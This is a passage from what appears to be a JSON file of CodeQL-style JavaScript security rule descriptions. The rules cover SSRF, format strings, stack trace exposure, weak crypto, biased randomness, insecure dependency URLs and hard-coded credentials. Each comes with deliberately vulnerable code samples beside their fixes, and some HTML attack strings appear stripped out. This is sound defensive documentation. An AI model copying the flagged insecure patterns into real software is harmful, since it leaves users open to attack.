[CWE-80](https://cwe.mitre.org/data/definitions/80.html).\n* Common Weakness Enumeration: [CWE-116](https://cwe.mitre.org/data/definitions/116.html).\n* Common Weakness Enumeration: [CWE-184](https://cwe.mitre.org/data/definitions/184.html).\n* Common Weakness Enumeration: [CWE-185](https://cwe.mitre.org/data/definitions/185.html).\n* Common Weakness Enumeration: [CWE-186](https://cwe.mitre.org/data/definitions/186.html).\n", - "markdown" : "# Bad HTML filtering regexp\nIt is possible to match some single HTML tags using regular expressions (parsing general HTML using regular expressions is impossible). However, if the regular expression is not written well it might be possible to circumvent it, which can lead to cross-site scripting or other security issues.\n\nSome of these mistakes are caused by browsers having very forgiving HTML parsers, and will often render invalid HTML containing syntax errors. Regular expressions that attempt to match HTML should also recognize tags containing such syntax errors.\n\n\n## Recommendation\nUse a well-tested sanitization or parser library if at all possible. These libraries are much more likely to handle corner cases correctly than a custom implementation.\n\n\n## Example\nThe following example attempts to filters out all `` as script end tags, but also tags such as `` even though it is a parser error. This means that an attack string such as `` will not be filtered by the function, and `alert(1)` will be executed by a browser if the string is rendered as HTML.\n\nOther corner cases include that HTML comments can end with `--!>`, and that HTML tag names can contain upper case characters.\n\n\n## References\n* Securitum: [The Curious Case of Copy & Paste](https://research.securitum.com/the-curious-case-of-copy-paste/).\n* stackoverflow.com: [You can't parse \\[X\\]HTML with regex](https://stackoverflow.com/questions/1732348/regex-match-open-tags-except-xhtml-self-contained-tags#answer-1732454).\n* HTML Standard: [Comment end bang state](https://html.spec.whatwg.org/multipage/parsing.html#comment-end-bang-state).\n* stackoverflow.com: [Why aren't browsers strict about HTML?](https://stackoverflow.com/questions/25559999/why-arent-browsers-strict-about-html).\n* Common Weakness Enumeration: [CWE-20](https://cwe.mitre.org/data/definitions/20.html).\n* Common Weakness Enumeration: [CWE-80](https://cwe.mitre.org/data/definitions/80.html).\n* Common Weakness Enumeration: [CWE-116](https://cwe.mitre.org/data/definitions/116.html).\n* Common Weakness Enumeration: [CWE-184](https://cwe.mitre.org/data/definitions/184.html).\n* Common Weakness Enumeration: [CWE-185](https://cwe.mitre.org/data/definitions/185.html).\n* Common Weakness Enumeration: [CWE-186](https://cwe.mitre.org/data/definitions/186.html).\n" - }, - "properties" : { - "tags" : [ "correctness", "security", "external/cwe/cwe-020", "external/cwe/cwe-080", "external/cwe/cwe-116", "external/cwe/cwe-184", "external/cwe/cwe-185", "external/cwe/cwe-186" ], - "description" : "Matching HTML tags using regular expressions is hard to do right, and can easily lead to security issues.", - "id" : "js/bad-tag-filter", - "kind" : "problem", - "name" : "Bad HTML filtering regexp", - "precision" : "high", - "problem.severity" : "warning", - "security-severity" : "7.8" - } - }, { - "id" : "js/tainted-format-string", - "name" : "js/tainted-format-string", - "shortDescription" : { - "text" : "Use of externally-controlled format string" - }, - "fullDescription" : { - "text" : "Using external input in format strings can lead to garbled output." - }, - "defaultConfiguration" : { - "enabled" : true, - "level" : "warning" - }, - "help" : { - "text" : "# Use of externally-controlled format string\nFunctions like the Node.js standard library function `util.format` accept a format string that is used to format the remaining arguments by providing inline format specifiers. If the format string contains unsanitized input from an untrusted source, then that string may contain unexpected format specifiers that cause garbled output.\n\n\n## Recommendation\nEither sanitize the input before including it in the format string, or use a `%s` specifier in the format string, and pass the untrusted data as corresponding argument.\n\n\n## Example\nThe following program snippet logs information about an unauthorized access attempt. The log message includes the user name, and the user's IP address is passed as an additional argument to `console.log` to be appended to the message:\n\n\n```javascript\nconst app = require(\"express\")();\n\napp.get(\"unauthorized\", function handler(req, res) {\n let user = req.query.user;\n let ip = req.connection.remoteAddress;\n console.log(\"Unauthorized access attempt by \" + user, ip);\n});\n\n```\nHowever, if a malicious user provides `%d` as their user name, `console.log` will instead attempt to format the `ip` argument as a number. Since IP addresses are not valid numbers, the result of this conversion is `NaN`. The resulting log message will read \"Unauthorized access attempt by NaN\", missing all the information that it was trying to log in the first place.\n\nInstead, the user name should be included using the `%s` specifier:\n\n\n```javascript\nconst app = require(\"express\")();\n\napp.get(\"unauthorized\", function handler(req, res) {\n let user = req.query.user;\n let ip = req.connection.remoteAddress;\n console.log(\"Unauthorized access attempt by %s\", user, ip);\n});\n\n```\n\n## References\n* Node.js Documentation: [util.format](https://nodejs.org/api/util.html#util_util_format_format_args).\n* Common Weakness Enumeration: [CWE-134](https://cwe.mitre.org/data/definitions/134.html).\n", - "markdown" : "# Use of externally-controlled format string\nFunctions like the Node.js standard library function `util.format` accept a format string that is used to format the remaining arguments by providing inline format specifiers. If the format string contains unsanitized input from an untrusted source, then that string may contain unexpected format specifiers that cause garbled output.\n\n\n## Recommendation\nEither sanitize the input before including it in the format string, or use a `%s` specifier in the format string, and pass the untrusted data as corresponding argument.\n\n\n## Example\nThe following program snippet logs information about an unauthorized access attempt. The log message includes the user name, and the user's IP address is passed as an additional argument to `console.log` to be appended to the message:\n\n\n```javascript\nconst app = require(\"express\")();\n\napp.get(\"unauthorized\", function handler(req, res) {\n let user = req.query.user;\n let ip = req.connection.remoteAddress;\n console.log(\"Unauthorized access attempt by \" + user, ip);\n});\n\n```\nHowever, if a malicious user provides `%d` as their user name, `console.log` will instead attempt to format the `ip` argument as a number. Since IP addresses are not valid numbers, the result of this conversion is `NaN`. The resulting log message will read \"Unauthorized access attempt by NaN\", missing all the information that it was trying to log in the first place.\n\nInstead, the user name should be included using the `%s` specifier:\n\n\n```javascript\nconst app = require(\"express\")();\n\napp.get(\"unauthorized\", function handler(req, res) {\n let user = req.query.user;\n let ip = req.connection.remoteAddress;\n console.log(\"Unauthorized access attempt by %s\", user, ip);\n});\n\n```\n\n## References\n* Node.js Documentation: [util.format](https://nodejs.org/api/util.html#util_util_format_format_args).\n* Common Weakness Enumeration: [CWE-134](https://cwe.mitre.org/data/definitions/134.html).\n" - }, - "properties" : { - "tags" : [ "security", "external/cwe/cwe-134" ], - "description" : "Using external input in format strings can lead to garbled output.", - "id" : "js/tainted-format-string", - "kind" : "path-problem", - "name" : "Use of externally-controlled format string", - "precision" : "high", - "problem.severity" : "warning", - "security-severity" : "7.3" - } - }, { - "id" : "js/request-forgery", - "name" : "js/request-forgery", - "shortDescription" : { - "text" : "Server-side request forgery" - }, - "fullDescription" : { - "text" : "Making a network request with user-controlled data in the URL allows for request forgery attacks." - }, - "defaultConfiguration" : { - "enabled" : true, - "level" : "error" - }, - "help" : { - "text" : "# Server-side request forgery\nDirectly incorporating user input in the URL of an outgoing HTTP request can enable a request forgery attack, in which the request is altered to target an unintended API endpoint or resource. If the server performing the request is connected to an internal network, this can give an attacker the means to bypass the network boundary and make requests against internal services. A forged request may perform an unintended action on behalf of the attacker, or cause information leak if redirected to an external server or if the request response is fed back to the user. It may also compromise the server making the request, if the request response is handled in an unsafe way.\n\n\n## Recommendation\nRestrict user inputs in the URL of an outgoing request, in particular:\n\n* Avoid user input in the hostname of the URL. Pick the hostname from an allow-list instead of constructing it directly from user input.\n* Take care when user input is part of the pathname of the URL. Restrict the input so that path traversal (\"`../`\") cannot be used to redirect the request to an unintended endpoint.\n\n## Example\nThe following example shows an HTTP request parameter being used directly in the URL of a request without validating the input, which facilitates an SSRF attack. The request `http.get(...)` is vulnerable since attackers can choose the value of `target` to be anything they want. For instance, the attacker can choose `\"internal.example.com/#\"` as the target, causing the URL used in the request to be `\"https://internal.example.com/#.example.com/data\"`.\n\nA request to `https://internal.example.com` may be problematic if that server is not meant to be directly accessible from the attacker's machine.\n\n\n```javascript\nimport http from 'http';\n\nconst server = http.createServer(function(req, res) {\n const target = new URL(req.url, \"http://example.com\").searchParams.get(\"target\");\n\n // BAD: `target` is controlled by the attacker\n http.get('https://' + target + \".example.com/data/\", res => {\n // process request response ...\n });\n\n});\n\n```\nOne way to remedy the problem is to use the user input to select a known fixed string before performing the request:\n\n\n```javascript\nimport http from 'http';\n\nconst server = http.createServer(function(req, res) {\n const target = new URL(req.url, \"http://example.com\").searchParams.get(\"target\");\n\n let subdomain;\n if (target === 'EU') {\n subdomain = \"europe\"\n } else {\n subdomain = \"world\"\n }\n\n // GOOD: `subdomain` is controlled by the server\n http.get('https://' + subdomain + \".example.com/data/\", res => {\n // process request response ...\n });\n\n});\n\n```\n\n## References\n* OWASP: [SSRF](https://www.owasp.org/index.php/Server_Side_Request_Forgery)\n* Common Weakness Enumeration: [CWE-918](https://cwe.mitre.org/data/definitions/918.html).\n", - "markdown" : "# Server-side request forgery\nDirectly incorporating user input in the URL of an outgoing HTTP request can enable a request forgery attack, in which the request is altered to target an unintended API endpoint or resource. If the server performing the request is connected to an internal network, this can give an attacker the means to bypass the network boundary and make requests against internal services. A forged request may perform an unintended action on behalf of the attacker, or cause information leak if redirected to an external server or if the request response is fed back to the user. It may also compromise the server making the request, if the request response is handled in an unsafe way.\n\n\n## Recommendation\nRestrict user inputs in the URL of an outgoing request, in particular:\n\n* Avoid user input in the hostname of the URL. Pick the hostname from an allow-list instead of constructing it directly from user input.\n* Take care when user input is part of the pathname of the URL. Restrict the input so that path traversal (\"`../`\") cannot be used to redirect the request to an unintended endpoint.\n\n## Example\nThe following example shows an HTTP request parameter being used directly in the URL of a request without validating the input, which facilitates an SSRF attack. The request `http.get(...)` is vulnerable since attackers can choose the value of `target` to be anything they want. For instance, the attacker can choose `\"internal.example.com/#\"` as the target, causing the URL used in the request to be `\"https://internal.example.com/#.example.com/data\"`.\n\nA request to `https://internal.example.com` may be problematic if that server is not meant to be directly accessible from the attacker's machine.\n\n\n```javascript\nimport http from 'http';\n\nconst server = http.createServer(function(req, res) {\n const target = new URL(req.url, \"http://example.com\").searchParams.get(\"target\");\n\n // BAD: `target` is controlled by the attacker\n http.get('https://' + target + \".example.com/data/\", res => {\n // process request response ...\n });\n\n});\n\n```\nOne way to remedy the problem is to use the user input to select a known fixed string before performing the request:\n\n\n```javascript\nimport http from 'http';\n\nconst server = http.createServer(function(req, res) {\n const target = new URL(req.url, \"http://example.com\").searchParams.get(\"target\");\n\n let subdomain;\n if (target === 'EU') {\n subdomain = \"europe\"\n } else {\n subdomain = \"world\"\n }\n\n // GOOD: `subdomain` is controlled by the server\n http.get('https://' + subdomain + \".example.com/data/\", res => {\n // process request response ...\n });\n\n});\n\n```\n\n## References\n* OWASP: [SSRF](https://www.owasp.org/index.php/Server_Side_Request_Forgery)\n* Common Weakness Enumeration: [CWE-918](https://cwe.mitre.org/data/definitions/918.html).\n" - }, - "properties" : { - "tags" : [ "security", "external/cwe/cwe-918" ], - "description" : "Making a network request with user-controlled data in the URL allows for request forgery attacks.", - "id" : "js/request-forgery", - "kind" : "path-problem", - "name" : "Server-side request forgery", - "precision" : "high", - "problem.severity" : "error", - "security-severity" : "9.1" - } - }, { - "id" : "js/stack-trace-exposure", - "name" : "js/stack-trace-exposure", - "shortDescription" : { - "text" : "Information exposure through a stack trace" - }, - "fullDescription" : { - "text" : "Propagating stack trace information to an external user can unintentionally reveal implementation details that are useful to an attacker for developing a subsequent exploit." - }, - "defaultConfiguration" : { - "enabled" : true, - "level" : "warning" - }, - "help" : { - "text" : "# Information exposure through a stack trace\nSoftware developers often add stack traces to error messages, as a debugging aid. Whenever that error message occurs for an end user, the developer can use the stack trace to help identify how to fix the problem. In particular, stack traces can tell the developer more about the sequence of events that led to a failure, as opposed to merely the final state of the software when the error occurred.\n\nUnfortunately, the same information can be useful to an attacker. The sequence of function names in a stack trace can reveal the structure of the application as well as any internal components it relies on. Furthermore, the error message at the top of a stack trace can include information such as server-side file names and SQL code that the application relies on, allowing an attacker to fine-tune a subsequent injection attack.\n\n\n## Recommendation\nSend the user a more generic error message that reveals less information. Either suppress the stack trace entirely, or log it only on the server.\n\n\n## Example\nIn the following example, an exception is caught and its stack trace is sent back to the remote user as part of the HTTP response. As such, the user is able to see a detailed stack trace, which may contain sensitive information.\n\n\n```javascript\nvar http = require('http');\n\nhttp.createServer(function onRequest(req, res) {\n var body;\n try {\n body = handleRequest(req);\n }\n catch (err) {\n res.statusCode = 500;\n res.setHeader(\"Content-Type\", \"text/plain\");\n res.end(err.stack); // NOT OK\n return;\n }\n res.statusCode = 200;\n res.setHeader(\"Content-Type\", \"application/json\");\n res.setHeader(\"Content-Length\", body.length);\n res.end(body);\n}).listen(3000);\n\n```\nInstead, the stack trace should be logged only on the server. That way, the developers can still access and use the error log, but remote users will not see the information:\n\n\n```javascript\nvar http = require('http');\n\nhttp.createServer(function onRequest(req, res) {\n var body;\n try {\n body = handleRequest(req);\n }\n catch (err) {\n res.statusCode = 500;\n res.setHeader(\"Content-Type\", \"text/plain\");\n log(\"Exception occurred\", err.stack);\n res.end(\"An exception occurred\"); // OK\n return;\n }\n res.statusCode = 200;\n res.setHeader(\"Content-Type\", \"application/json\");\n res.setHeader(\"Content-Length\", body.length);\n res.end(body);\n}).listen(3000);\n\n```\n\n## References\n* OWASP: [Improper Error Handling](https://owasp.org/www-community/Improper_Error_Handling).\n* Common Weakness Enumeration: [CWE-209](https://cwe.mitre.org/data/definitions/209.html).\n* Common Weakness Enumeration: [CWE-497](https://cwe.mitre.org/data/definitions/497.html).\n", - "markdown" : "# Information exposure through a stack trace\nSoftware developers often add stack traces to error messages, as a debugging aid. Whenever that error message occurs for an end user, the developer can use the stack trace to help identify how to fix the problem. In particular, stack traces can tell the developer more about the sequence of events that led to a failure, as opposed to merely the final state of the software when the error occurred.\n\nUnfortunately, the same information can be useful to an attacker. The sequence of function names in a stack trace can reveal the structure of the application as well as any internal components it relies on. Furthermore, the error message at the top of a stack trace can include information such as server-side file names and SQL code that the application relies on, allowing an attacker to fine-tune a subsequent injection attack.\n\n\n## Recommendation\nSend the user a more generic error message that reveals less information. Either suppress the stack trace entirely, or log it only on the server.\n\n\n## Example\nIn the following example, an exception is caught and its stack trace is sent back to the remote user as part of the HTTP response. As such, the user is able to see a detailed stack trace, which may contain sensitive information.\n\n\n```javascript\nvar http = require('http');\n\nhttp.createServer(function onRequest(req, res) {\n var body;\n try {\n body = handleRequest(req);\n }\n catch (err) {\n res.statusCode = 500;\n res.setHeader(\"Content-Type\", \"text/plain\");\n res.end(err.stack); // NOT OK\n return;\n }\n res.statusCode = 200;\n res.setHeader(\"Content-Type\", \"application/json\");\n res.setHeader(\"Content-Length\", body.length);\n res.end(body);\n}).listen(3000);\n\n```\nInstead, the stack trace should be logged only on the server. That way, the developers can still access and use the error log, but remote users will not see the information:\n\n\n```javascript\nvar http = require('http');\n\nhttp.createServer(function onRequest(req, res) {\n var body;\n try {\n body = handleRequest(req);\n }\n catch (err) {\n res.statusCode = 500;\n res.setHeader(\"Content-Type\", \"text/plain\");\n log(\"Exception occurred\", err.stack);\n res.end(\"An exception occurred\"); // OK\n return;\n }\n res.statusCode = 200;\n res.setHeader(\"Content-Type\", \"application/json\");\n res.setHeader(\"Content-Length\", body.length);\n res.end(body);\n}).listen(3000);\n\n```\n\n## References\n* OWASP: [Improper Error Handling](https://owasp.org/www-community/Improper_Error_Handling).\n* Common Weakness Enumeration: [CWE-209](https://cwe.mitre.org/data/definitions/209.html).\n* Common Weakness Enumeration: [CWE-497](https://cwe.mitre.org/data/definitions/497.html).\n" - }, - "properties" : { - "tags" : [ "security", "external/cwe/cwe-209", "external/cwe/cwe-497" ], - "description" : "Propagating stack trace information to an external user can\n unintentionally reveal implementation details that are useful\n to an attacker for developing a subsequent exploit.", - "id" : "js/stack-trace-exposure", - "kind" : "path-problem", - "name" : "Information exposure through a stack trace", - "precision" : "very-high", - "problem.severity" : "warning", - "security-severity" : "5.4" - } - }, { - "id" : "js/weak-cryptographic-algorithm", - "name" : "js/weak-cryptographic-algorithm", - "shortDescription" : { - "text" : "Use of a broken or weak cryptographic algorithm" - }, - "fullDescription" : { - "text" : "Using broken or weak cryptographic algorithms can compromise security." - }, - "defaultConfiguration" : { - "enabled" : true, - "level" : "warning" - }, - "help" : { - "text" : "# Use of a broken or weak cryptographic algorithm\nUsing broken or weak cryptographic algorithms can leave data vulnerable to being decrypted or forged by an attacker.\n\nMany cryptographic algorithms provided by cryptography libraries are known to be weak, or flawed. Using such an algorithm means that encrypted or hashed data is less secure than it appears to be.\n\n\n## Recommendation\nEnsure that you use a strong, modern cryptographic algorithm. Use at least AES-128 or RSA-2048 for encryption, and SHA-2 or SHA-3 for secure hashing.\n\n\n## Example\nThe following code shows an example of using the builtin cryptographic library of NodeJS to encrypt some secret data. When creating a `Cipher` instance to encrypt the secret data with, you must specify the encryption algorithm to use. The first example uses DES, which is an older algorithm that is now considered weak. The second example uses AES, which is a strong modern algorithm.\n\n\n```javascript\nconst crypto = require('crypto');\n\nvar secretText = obj.getSecretText();\n\nconst desCipher = crypto.createCipher('des', key);\nlet desEncrypted = desCipher.write(secretText, 'utf8', 'hex'); // BAD: weak encryption\n\nconst aesCipher = crypto.createCipher('aes-128', key);\nlet aesEncrypted = aesCipher.update(secretText, 'utf8', 'hex'); // GOOD: strong encryption\n\n```\n\n## References\n* NIST, FIPS 140 Annex a: [ Approved Security Functions](http://csrc.nist.gov/publications/fips/fips140-2/fips1402annexa.pdf).\n* NIST, SP 800-131A: [ Transitions: Recommendation for Transitioning the Use of Cryptographic Algorithms and Key Lengths](http://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-131Ar1.pdf).\n* OWASP: [Rule - Use strong approved cryptographic algorithms](https://cheatsheetseries.owasp.org/cheatsheets/Cryptographic_Storage_Cheat_Sheet.html#rule---use-strong-approved-authenticated-encryption).\n* Common Weakness Enumeration: [CWE-327](https://cwe.mitre.org/data/definitions/327.html).\n* Common Weakness Enumeration: [CWE-328](https://cwe.mitre.org/data/definitions/328.html).\n", - "markdown" : "# Use of a broken or weak cryptographic algorithm\nUsing broken or weak cryptographic algorithms can leave data vulnerable to being decrypted or forged by an attacker.\n\nMany cryptographic algorithms provided by cryptography libraries are known to be weak, or flawed. Using such an algorithm means that encrypted or hashed data is less secure than it appears to be.\n\n\n## Recommendation\nEnsure that you use a strong, modern cryptographic algorithm. Use at least AES-128 or RSA-2048 for encryption, and SHA-2 or SHA-3 for secure hashing.\n\n\n## Example\nThe following code shows an example of using the builtin cryptographic library of NodeJS to encrypt some secret data. When creating a `Cipher` instance to encrypt the secret data with, you must specify the encryption algorithm to use. The first example uses DES, which is an older algorithm that is now considered weak. The second example uses AES, which is a strong modern algorithm.\n\n\n```javascript\nconst crypto = require('crypto');\n\nvar secretText = obj.getSecretText();\n\nconst desCipher = crypto.createCipher('des', key);\nlet desEncrypted = desCipher.write(secretText, 'utf8', 'hex'); // BAD: weak encryption\n\nconst aesCipher = crypto.createCipher('aes-128', key);\nlet aesEncrypted = aesCipher.update(secretText, 'utf8', 'hex'); // GOOD: strong encryption\n\n```\n\n## References\n* NIST, FIPS 140 Annex a: [ Approved Security Functions](http://csrc.nist.gov/publications/fips/fips140-2/fips1402annexa.pdf).\n* NIST, SP 800-131A: [ Transitions: Recommendation for Transitioning the Use of Cryptographic Algorithms and Key Lengths](http://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-131Ar1.pdf).\n* OWASP: [Rule - Use strong approved cryptographic algorithms](https://cheatsheetseries.owasp.org/cheatsheets/Cryptographic_Storage_Cheat_Sheet.html#rule---use-strong-approved-authenticated-encryption).\n* Common Weakness Enumeration: [CWE-327](https://cwe.mitre.org/data/definitions/327.html).\n* Common Weakness Enumeration: [CWE-328](https://cwe.mitre.org/data/definitions/328.html).\n" - }, - "properties" : { - "tags" : [ "security", "external/cwe/cwe-327", "external/cwe/cwe-328" ], - "description" : "Using broken or weak cryptographic algorithms can compromise security.", - "id" : "js/weak-cryptographic-algorithm", - "kind" : "path-problem", - "name" : "Use of a broken or weak cryptographic algorithm", - "precision" : "high", - "problem.severity" : "warning", - "security-severity" : "7.5" - } - }, { - "id" : "js/biased-cryptographic-random", - "name" : "js/biased-cryptographic-random", - "shortDescription" : { - "text" : "Creating biased random numbers from a cryptographically secure source." - }, - "fullDescription" : { - "text" : "Some mathematical operations on random numbers can cause bias in the results and compromise security." - }, - "defaultConfiguration" : { - "enabled" : true, - "level" : "warning" - }, - "help" : { - "text" : "# Creating biased random numbers from a cryptographically secure source.\nGenerating secure random numbers can be an important part of creating a secure software system. This can be done using APIs that create cryptographically secure random numbers.\n\nHowever, using some mathematical operations on these cryptographically secure random numbers can create biased results, where some outcomes are more likely than others. Such biased results can make it easier for an attacker to guess the random numbers, and thereby break the security of the software system.\n\n\n## Recommendation\nBe very careful not to introduce bias when performing mathematical operations on cryptographically secure random numbers.\n\nIf possible, avoid performing mathematical operations on cryptographically secure random numbers at all, and use a preexisting library instead.\n\n\n## Example\nThe example below uses the modulo operator to create an array of 10 random digits using random bytes as the source for randomness.\n\n\n```javascript\nconst crypto = require('crypto');\n\nconst digits = [];\nfor (let i = 0; i < 10; i++) {\n digits.push(crypto.randomBytes(1)[0] % 10); // NOT OK\n}\n```\nThe random byte is a uniformly random value between 0 and 255, and thus the result from using the modulo operator is slightly more likely to be between 0 and 5 than between 6 and 9.\n\nThe issue has been fixed in the code below by using a library that correctly generates cryptographically secure random values.\n\n\n```javascript\nconst cryptoRandomString = require('crypto-random-string');\n\nconst digits = cryptoRandomString({length: 10, type: 'numeric'});\n```\nAlternatively, the issue can be fixed by fixing the math in the original code. In the code below the random byte is discarded if the value is greater than or equal to 250. Thus the modulo operator is used on a uniformly random number between 0 and 249, which results in a uniformly random digit between 0 and 9.\n\n\n```javascript\nconst crypto = require('crypto');\n\nconst digits = [];\nwhile (digits.length < 10) {\n const byte = crypto.randomBytes(1)[0];\n if (byte >= 250) {\n continue;\n }\n digits.push(byte % 10); // OK\n}\n```\n\n## References\n* Stack Overflow: [Understanding “randomness”](https://stackoverflow.com/questions/3956478/understanding-randomness).\n* OWASP: [Insecure Randomness](https://owasp.org/www-community/vulnerabilities/Insecure_Randomness).\n* OWASP: [Rule - Use strong approved cryptographic algorithms](https://cheatsheetseries.owasp.org/cheatsheets/Cryptographic_Storage_Cheat_Sheet.html#rule---use-strong-approved-authenticated-encryption).\n* Common Weakness Enumeration: [CWE-327](https://cwe.mitre.org/data/definitions/327.html).\n", - "markdown" : "# Creating biased random numbers from a cryptographically secure source.\nGenerating secure random numbers can be an important part of creating a secure software system. This can be done using APIs that create cryptographically secure random numbers.\n\nHowever, using some mathematical operations on these cryptographically secure random numbers can create biased results, where some outcomes are more likely than others. Such biased results can make it easier for an attacker to guess the random numbers, and thereby break the security of the software system.\n\n\n## Recommendation\nBe very careful not to introduce bias when performing mathematical operations on cryptographically secure random numbers.\n\nIf possible, avoid performing mathematical operations on cryptographically secure random numbers at all, and use a preexisting library instead.\n\n\n## Example\nThe example below uses the modulo operator to create an array of 10 random digits using random bytes as the source for randomness.\n\n\n```javascript\nconst crypto = require('crypto');\n\nconst digits = [];\nfor (let i = 0; i < 10; i++) {\n digits.push(crypto.randomBytes(1)[0] % 10); // NOT OK\n}\n```\nThe random byte is a uniformly random value between 0 and 255, and thus the result from using the modulo operator is slightly more likely to be between 0 and 5 than between 6 and 9.\n\nThe issue has been fixed in the code below by using a library that correctly generates cryptographically secure random values.\n\n\n```javascript\nconst cryptoRandomString = require('crypto-random-string');\n\nconst digits = cryptoRandomString({length: 10, type: 'numeric'});\n```\nAlternatively, the issue can be fixed by fixing the math in the original code. In the code below the random byte is discarded if the value is greater than or equal to 250. Thus the modulo operator is used on a uniformly random number between 0 and 249, which results in a uniformly random digit between 0 and 9.\n\n\n```javascript\nconst crypto = require('crypto');\n\nconst digits = [];\nwhile (digits.length < 10) {\n const byte = crypto.randomBytes(1)[0];\n if (byte >= 250) {\n continue;\n }\n digits.push(byte % 10); // OK\n}\n```\n\n## References\n* Stack Overflow: [Understanding “randomness”](https://stackoverflow.com/questions/3956478/understanding-randomness).\n* OWASP: [Insecure Randomness](https://owasp.org/www-community/vulnerabilities/Insecure_Randomness).\n* OWASP: [Rule - Use strong approved cryptographic algorithms](https://cheatsheetseries.owasp.org/cheatsheets/Cryptographic_Storage_Cheat_Sheet.html#rule---use-strong-approved-authenticated-encryption).\n* Common Weakness Enumeration: [CWE-327](https://cwe.mitre.org/data/definitions/327.html).\n" - }, - "properties" : { - "tags" : [ "security", "external/cwe/cwe-327" ], - "description" : "Some mathematical operations on random numbers can cause bias in\n the results and compromise security.", - "id" : "js/biased-cryptographic-random", - "kind" : "problem", - "name" : "Creating biased random numbers from a cryptographically secure source.", - "precision" : "high", - "problem.severity" : "warning", - "security-severity" : "7.5" - } - }, { - "id" : "js/insecure-dependency", - "name" : "js/insecure-dependency", - "shortDescription" : { - "text" : "Dependency download using unencrypted communication channel" - }, - "fullDescription" : { - "text" : "Using unencrypted protocols to fetch dependencies can leave an application open to man-in-the-middle attacks." - }, - "defaultConfiguration" : { - "enabled" : true, - "level" : "warning" - }, - "help" : { - "text" : "# Dependency download using unencrypted communication channel\nUsing an insecure protocol like HTTP or FTP to download build dependencies makes the build process vulnerable to a man-in-the-middle (MITM) attack.\n\nThis can allow attackers to inject malicious code into the downloaded dependencies, and thereby infect the build artifacts and execute arbitrary code on the machine building the artifacts.\n\n\n## Recommendation\nAlways use a secure protocol, such as HTTPS or SFTP, when downloading artifacts from an URL.\n\n\n## Example\nThe below example shows a `package.json` file that downloads a dependency using the insecure HTTP protocol.\n\n\n```json\n{\n \"name\": \"example-project\",\n \"dependencies\": {\n \"unencrypted\": \"http://example.org/foo/tarball/release/0.0.1\",\n \"lodash\": \"^4.0.0\"\n }\n}\n```\nThe fix is to change the protocol to HTTPS.\n\n\n```json\n{\n \"name\": \"example-project\",\n \"dependencies\": {\n \"unencrypted\": \"https://example.org/foo/tarball/release/0.0.1\",\n \"lodash\": \"^4.0.0\"\n }\n}\n```\n\n## References\n* Jonathan Leitschuh: [ Want to take over the Java ecosystem? All you need is a MITM! ](https://infosecwriteups.com/want-to-take-over-the-java-ecosystem-all-you-need-is-a-mitm-1fc329d898fb)\n* Max Veytsman: [ How to take over the computer of any Java (or Closure or Scala) Developer. ](https://max.computer/blog/how-to-take-over-the-computer-of-any-java-or-clojure-or-scala-developer/)\n* Wikipedia: [Supply chain attack.](https://en.wikipedia.org/wiki/Supply_chain_attack)\n* Wikipedia: [Man-in-the-middle attack.](https://en.wikipedia.org/wiki/Man-in-the-middle_attack)\n* Common Weakness Enumeration: [CWE-300](https://cwe.mitre.org/data/definitions/300.html).\n* Common Weakness Enumeration: [CWE-319](https://cwe.mitre.org/data/definitions/319.html).\n* Common Weakness Enumeration: [CWE-494](https://cwe.mitre.org/data/definitions/494.html).\n* Common Weakness Enumeration: [CWE-829](https://cwe.mitre.org/data/definitions/829.html).\n", - "markdown" : "# Dependency download using unencrypted communication channel\nUsing an insecure protocol like HTTP or FTP to download build dependencies makes the build process vulnerable to a man-in-the-middle (MITM) attack.\n\nThis can allow attackers to inject malicious code into the downloaded dependencies, and thereby infect the build artifacts and execute arbitrary code on the machine building the artifacts.\n\n\n## Recommendation\nAlways use a secure protocol, such as HTTPS or SFTP, when downloading artifacts from an URL.\n\n\n## Example\nThe below example shows a `package.json` file that downloads a dependency using the insecure HTTP protocol.\n\n\n```json\n{\n \"name\": \"example-project\",\n \"dependencies\": {\n \"unencrypted\": \"http://example.org/foo/tarball/release/0.0.1\",\n \"lodash\": \"^4.0.0\"\n }\n}\n```\nThe fix is to change the protocol to HTTPS.\n\n\n```json\n{\n \"name\": \"example-project\",\n \"dependencies\": {\n \"unencrypted\": \"https://example.org/foo/tarball/release/0.0.1\",\n \"lodash\": \"^4.0.0\"\n }\n}\n```\n\n## References\n* Jonathan Leitschuh: [ Want to take over the Java ecosystem? All you need is a MITM! ](https://infosecwriteups.com/want-to-take-over-the-java-ecosystem-all-you-need-is-a-mitm-1fc329d898fb)\n* Max Veytsman: [ How to take over the computer of any Java (or Closure or Scala) Developer. ](https://max.computer/blog/how-to-take-over-the-computer-of-any-java-or-clojure-or-scala-developer/)\n* Wikipedia: [Supply chain attack.](https://en.wikipedia.org/wiki/Supply_chain_attack)\n* Wikipedia: [Man-in-the-middle attack.](https://en.wikipedia.org/wiki/Man-in-the-middle_attack)\n* Common Weakness Enumeration: [CWE-300](https://cwe.mitre.org/data/definitions/300.html).\n* Common Weakness Enumeration: [CWE-319](https://cwe.mitre.org/data/definitions/319.html).\n* Common Weakness Enumeration: [CWE-494](https://cwe.mitre.org/data/definitions/494.html).\n* Common Weakness Enumeration: [CWE-829](https://cwe.mitre.org/data/definitions/829.html).\n" - }, - "properties" : { - "tags" : [ "security", "external/cwe/cwe-300", "external/cwe/cwe-319", "external/cwe/cwe-494", "external/cwe/cwe-829" ], - "description" : "Using unencrypted protocols to fetch dependencies can leave an application\n open to man-in-the-middle attacks.", - "id" : "js/insecure-dependency", - "kind" : "problem", - "name" : "Dependency download using unencrypted communication channel", - "precision" : "high", - "problem.severity" : "warning", - "security-severity" : "8.1" - } - }, { - "id" : "js/hardcoded-credentials", - "name" : "js/hardcoded-credentials", - "shortDescription" : { - "text" : "Hard-coded credentials" - }, - "fullDescription" : { - "text" : "Hard-coding credentials in source code may enable an attacker to gain unauthorized access." - }, - "defaultConfiguration" : { - "enabled" : true, - "level" : "warning" - }, - "help" : { - "text" : "# Hard-coded credentials\nIncluding unencrypted hard-coded authentication credentials in source code is dangerous because the credentials may be easily discovered. For example, the code may be open source, or it may be leaked or accidentally revealed, making the credentials visible to an attacker. This, in turn, might enable them to gain unauthorized access, or to obtain privileged information.\n\n\n## Recommendation\nRemove hard-coded credentials, such as user names, passwords and certificates, from source code. Instead, place them in configuration files, environment variables or other data stores if necessary. If possible, store configuration files including credential data separately from the source code, in a secure location with restricted access.\n\n\n## Example\nThe following code example connects to an HTTP request using an hard-codes authentication header:\n\n\n```javascript\nlet base64 = require('base-64');\n\nlet url = 'http://example.org/auth';\nlet username = 'user';\nlet password = 